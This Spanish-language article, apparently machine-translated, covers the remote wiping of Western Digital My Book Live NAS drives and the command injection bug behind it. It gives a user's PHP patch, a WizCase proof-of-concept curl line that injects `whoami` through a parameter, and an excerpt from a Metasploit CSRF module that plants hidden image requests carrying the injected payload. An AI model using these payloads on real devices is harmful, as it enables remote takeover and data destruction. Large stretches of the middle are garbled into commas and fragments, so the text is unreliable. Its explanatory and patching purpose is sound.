Para conocer la tan comentada historia de la limpieza de NAS de Western Digital, lea la publicación de @ZlodeiBaal : Western Digital borró la mayoría de NAS de usuarios
Aquí también se tratará de arreglar una vulnerabilidad, que, como resultó, tiene 7 años (2014), deja que Western Digital se dé de baja hace 3 días con el siguiente párrafo:
"La serie My Book Live se introdujo en el mercado en 2010 y recibió la última actualización de firmware en 2015.
La serie My Book Live se introdujo en el mercado en 2010 y estos dispositivos recibieron su última actualización de firmware en 2015. [1]
Hace 17 horas, el usuario dracenmarx publicó las siguientes instrucciones para corregir un error de ejecución remota de código (RCE):
Pasamos por SSH y editamos el archivo (por ejemplo, con nano):
/var/www/Admin/webapp/includes/languageConfiguration.php
El primer cambio, encontramos:
exec("sudo bash -c '(echo \"language {$changes["language"]}\">/etc/language.conf)'", $output, $retVal);
Reemplazar con:
if (!preg_match('/^[a-z]{2}_[A-Z]{2}$/', $changes["language"], $dummy)) return 'BAD_REQUEST';
exec("sudo bash -c '(echo '\"'\"".escapeshellarg("language {$changes["language"]}")."\"'\"'>/etc/language.conf)'", $output, $retVal);
El segundo cambio, encontramos:
exec("sudo bash -c '(echo \"language {$lang["language"]}\">/etc/language.conf)'", $output, $retVal);
Reemplazar con:
if (!preg_match('/^[a-z]{2}_[A-Z]{2}$/', $lang["language"], $dummy)) return 'BAD_REQUEST';
exec("sudo bash -c '(echo '\"'\"".escapeshellarg("language {$lang["language"]}")."\"'\"'>/etc/language.conf)'", $output, $retVal);
Más, según él, no encontró errores similares.
, , , , sudo c sudoers. , , - ! , exec , STDOUT.
, dracenmarx , 2018- , ? https://cve.circl.lu/cve/CVE-2018-18472 ( - WizCase)
Western Digital WD My Book Live ( ) language /api/1.0/rest/language_configuration. , .
, , — . ? — . WizCase PoC:
curl -kX GET -d ‘bim=param`whoami`’ https:///panel/rest/configuration
WD 2018-, , , . , , , . - dracenmarx, 26 .
, dracenmarx:
CVE-2018-18472, , 2014-! (WDMyCloud Command Injection CSRF) , MyBookLive WD ?! - dracenmarx, 26
. 20- 2014. Metasploit. :
Name: WDMyCloud NAS Command Injection CSRF
Description: This module exploits a command injection vulnerability in the web interface of the WDMyCloud NAS device, via CSRF. It will submit the CSRF request to RHOST, as well as wdmycloud and wdmycloud.local.
DisclosureDate: 0 day, yo
3 , , NAS, .
params = "format=xml&rest_method=PUT&language=" + Rex::Text.uri_encode("`#{payload.encoded}`")
...
<html>
<body>
<h1>Redirecting... Please Wait</h1>
<div style='display:none'>
<img src='http://wdmycloud.local/api/1.0/rest/language_configuration?#{params}' />
<img src='http://wdmycloud/api/1.0/rest/language_configuration?#{params}' />
<img src='http://#{datastore['RHOST']}/api/1.0/rest/language_configuration?#{params}' />
</div>
, . language ! 2014.
, . 11 2014- 29- 2015-. , ... PR :)
, "", (→ https://gist.github.com/phikshun) 7 , , WD - 2018-. - ( , ), — , :
The vulnerability report CVE-2018-18472 affects My Book Live devices originally introduced to the market between 2010 and 2012. These products have been discontinued since 2014 and are no longer covered under our device software support lifecycle. We encourage users who wish to continue operating these legacy products to configure their firewall to prevent remote access to these devices, and to take measures to ensure that only trusted devices on the local network have access to the device.
Western Digital takes the security of our customers’ data seriously, and we provide security updates for our products to address issues from both external reports and regular security audits. Additionally, we welcome the opportunity to work with members of the security research community through responsible disclosure to help protect our users. [...]
- WizCase
— B2B, . MBA, IT.
, , — , .
— .
, TestDisk/PhotoRec . — dd, — openssl . , :
I got a quote for data recovery and it was $2,000 to $5,000. Unbelievable. - mkennedy
Another affected user here in Canada. I had no idea there was an issue until I read the email from WD this afternoon. I checked the drive and sure enough, only the default folders were there. I unplugged the drive and here we are. I’m a hobby photographer, approximately 80,000 photos gone. I’m on the support chat waitlist, it’s been 11 seconds remaining for the past 20 minutes so I’m not holding my breath. - damack604